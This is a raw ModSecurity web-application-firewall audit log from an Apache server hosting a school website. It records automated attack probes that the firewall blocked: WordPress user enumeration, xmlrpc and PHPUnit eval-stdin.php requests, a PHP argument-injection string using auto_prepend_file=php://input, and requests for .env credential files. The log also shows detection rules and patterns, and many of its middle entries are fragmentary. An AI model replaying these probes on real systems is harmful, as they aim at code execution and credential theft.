userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465944535589 6062 (- - -) Stopwatch2: 1746465944535589 6062; combined=4369, p1=535, p2=3595, p3=42, p4=33, p5=97, sr=72, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d356c13-Z-- --61e25275-A-- [06/May/2025:00:26:20 +0700] aBj0vPZJDMuQndL03JNoKgAAAFY 103.236.140.4 59044 103.236.140.4 8181 --61e25275-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61e25275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61e25275-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465980429660 2963 (- - -) Stopwatch2: 1746465980429660 2963; combined=1516, p1=478, p2=1002, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61e25275-Z-- --4d925b3f-A-- [06/May/2025:00:26:23 +0700] aBj0vwRwKNFSM6B7_LapOgAAAJc 103.236.140.4 59072 103.236.140.4 8181 --4d925b3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.113 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d925b3f-C-- demo.sayHello --4d925b3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d925b3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465983966464 6799 (- - -) Stopwatch2: 1746465983966464 6799; combined=4986, p1=654, p2=4082, p3=38, p4=42, p5=100, sr=76, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d925b3f-Z-- --4dc84b00-A-- [06/May/2025:00:26:35 +0700] aBj0y02V_h1VFAgsfgaI8AAAAAs 103.236.140.4 59194 103.236.140.4 8181 --4dc84b00-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4dc84b00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dc84b00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465995624320 2171 (- - -) Stopwatch2: 1746465995624320 2171; combined=1192, p1=389, p2=772, p3=0, p4=0, p5=31, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dc84b00-Z-- --c4ad692d-A-- [06/May/2025:00:26:40 +0700] aBj00E2V_h1VFAgsfgaI9gAAAAA 103.236.140.4 59230 103.236.140.4 8181 --c4ad692d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c4ad692d-C-- demo.sayHello --c4ad692d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4ad692d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746466000629611 6423 (- - -) Stopwatch2: 1746466000629611 6423; combined=4724, p1=597, p2=3891, p3=38, p4=43, p5=93, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4ad692d-Z-- --4f40d428-A-- [06/May/2025:00:28:43 +0700] aBj1S4ZWvR7-42f6JrAW6wAAAMo 103.236.140.4 60242 103.236.140.4 8181 --4f40d428-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4f40d428-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f40d428-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746466123762471 2925 (- - -) Stopwatch2: 1746466123762471 2925; combined=1265, p1=412, p2=817, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f40d428-Z-- --cb8b182e-A-- [06/May/2025:00:28:47 +0700] aBj1T4ZWvR7-42f6JrAW7QAAAM8 103.236.140.4 60286 103.236.140.4 8181 --cb8b182e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb8b182e-C-- demo.sayHello --cb8b182e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb8b182e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746466127447953 5736 (- - -) Stopwatch2: 1746466127447953 5736; combined=4251, p1=541, p2=3429, p3=30, p4=31, p5=125, sr=91, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb8b182e-Z-- --8f94722e-A-- [06/May/2025:00:30:49 +0700] aBj1yU2V_h1VFAgsfgaJqwAAAA0 103.236.140.4 33042 103.236.140.4 8181 --8f94722e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f94722e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f94722e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746466249700516 2575 (- - -) Stopwatch2: 1746466249700516 2575; combined=1149, p1=396, p2=724, p3=0, p4=0, p5=29, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f94722e-Z-- --391a246e-A-- [06/May/2025:00:30:54 +0700] aBj1zoZWvR7-42f6JrAXIQAAANQ 103.236.140.4 33078 103.236.140.4 8181 --391a246e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --391a246e-C-- demo.sayHello --391a246e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --391a246e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746466254128962 5222 (- - -) Stopwatch2: 1746466254128962 5222; combined=4266, p1=542, p2=3504, p3=32, p4=35, p5=91, sr=73, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --391a246e-Z-- --dead7410-A-- [06/May/2025:00:31:37 +0700] aBj1-QRwKNFSM6B7_LapswAAAI8 103.236.140.4 33430 103.236.140.4 8181 --dead7410-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dead7410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dead7410-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746466297139381 3009 (- - -) Stopwatch2: 1746466297139381 3009; combined=1265, p1=416, p2=820, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dead7410-Z-- --3f44f514-A-- [06/May/2025:00:31:40 +0700] aBj1_E2V_h1VFAgsfgaJ0QAAABM 103.236.140.4 33470 103.236.140.4 8181 --3f44f514-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f44f514-C-- demo.sayHello --3f44f514-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f44f514-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746466300859427 5616 (- - -) Stopwatch2: 1746466300859427 5616; combined=4134, p1=515, p2=3394, p3=33, p4=35, p5=93, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f44f514-Z-- --629bdd2c-A-- [06/May/2025:00:53:17 +0700] aBj7DU2V_h1VFAgsfgaN1gAAAAI 103.236.140.4 43818 103.236.140.4 8181 --629bdd2c-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.146.57.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.146.57.183 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.31.0 Accept: */* Content-Type: application/x-www-form-urlencoded --629bdd2c-C-- --629bdd2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --629bdd2c-E-- --629bdd2c-H-- Message: Access denied with code 403 (phase 2). String match " --9035bf6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9035bf6f-E-- --9035bf6f-H-- Message: Access denied with code 403 (phase 2). String match " --a1feb553-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1feb553-E-- --a1feb553-H-- Message: Access denied with code 403 (phase 2). String match " --f29e1306-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29e1306-H-- Message: Access denied with code 403 (phase 2). String match " --bfc22535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfc22535-E-- --bfc22535-H-- Message: Access denied with code 403 (phase 2). String match " --5fb3fe25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fb3fe25-E-- --5fb3fe25-H-- Message: Access denied with code 403 (phase 2). String match " --12bf0979-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12bf0979-H-- Message: Access denied with code 403 (phase 2). String match " --c8d68f6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8d68f6a-E-- --c8d68f6a-H-- Message: Access denied with code 403 (phase 2). String match " --b5aa8f71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5aa8f71-E-- --b5aa8f71-H-- Message: Access denied with code 403 (phase 2). String match " --8584123e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8584123e-E-- --8584123e-H-- Message: Access denied with code 403 (phase 2). String match " --ab09bb1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab09bb1a-E-- --ab09bb1a-H-- Message: Access denied with code 403 (phase 2). String match " --ae43645d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae43645d-H-- Message: Access denied with code 403 (phase 2). String match " --e695127e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e695127e-E-- --e695127e-H-- Message: Access denied with code 403 (phase 2). String match " --aab46b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aab46b51-E-- --aab46b51-H-- Message: Access denied with code 403 (phase 2). String match " --7d7e221f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d7e221f-H-- Message: Access denied with code 403 (phase 2). String match " --4ce2ba5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ce2ba5d-E-- --4ce2ba5d-H-- Message: Access denied with code 403 (phase 2). String match " --32ee9f05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32ee9f05-E-- --32ee9f05-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746496374116818 5792 (- - -) Stopwatch2: 1746496374116818 5792; combined=4127, p1=530, p2=3543, p3=0, p4=0, p5=54, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32ee9f05-Z-- --9664cf2b-A-- [06/May/2025:10:35:23 +0700] aBmDezhugRYtrdwuywwLEwAAAIk 103.236.140.4 43568 103.236.140.4 8181 --9664cf2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi Y2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --9664cf2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9664cf2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746502523254016 791 (- - -) Stopwatch2: 1746502523254016 791; combined=363, p1=323, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9664cf2b-Z-- --0076f413-A-- [06/May/2025:11:21:45 +0700] aBmOWfXApPfVm9Q69EhXcgAAAMw 103.236.140.4 47578 103.236.140.4 8181 --0076f413-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 64.225.75.246 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --0076f413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0076f413-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746505305585319 757 (- - -) Stopwatch2: 1746505305585319 757; combined=299, p1=261, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0076f413-Z-- --a2a0a02a-A-- [06/May/2025:11:31:00 +0700] aBmQhEfy6a2jfN9asT6bHwAAABM 103.236.140.4 53078 103.236.140.4 8181 --a2a0a02a-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 143.244.168.161 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 143.244.168.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a2a0a02a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2a0a02a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746505860505529 826 (- - -) Stopwatch2: 1746505860505529 826; combined=323, p1=279, p2=0, p3=0, p4=0, p5=44, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2a0a02a-Z-- --f86a2952-A-- [06/May/2025:11:32:15 +0700] aBmQz_XApPfVm9Q69EhYyAAAAMk 103.236.140.4 53820 103.236.140.4 8181 --f86a2952-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 157.230.19.140 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 157.230.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f86a2952-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f86a2952-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746505935587599 712 (- - -) Stopwatch2: 1746505935587599 712; combined=299, p1=267, p2=0, p3=0, p4=0, p5=32, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f86a2952-Z-- --f7c2a46b-A-- [06/May/2025:12:19:52 +0700] aBmb-Efy6a2jfN9asT6j0QAAABE 103.236.140.4 54296 103.236.140.4 8181 --f7c2a46b-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 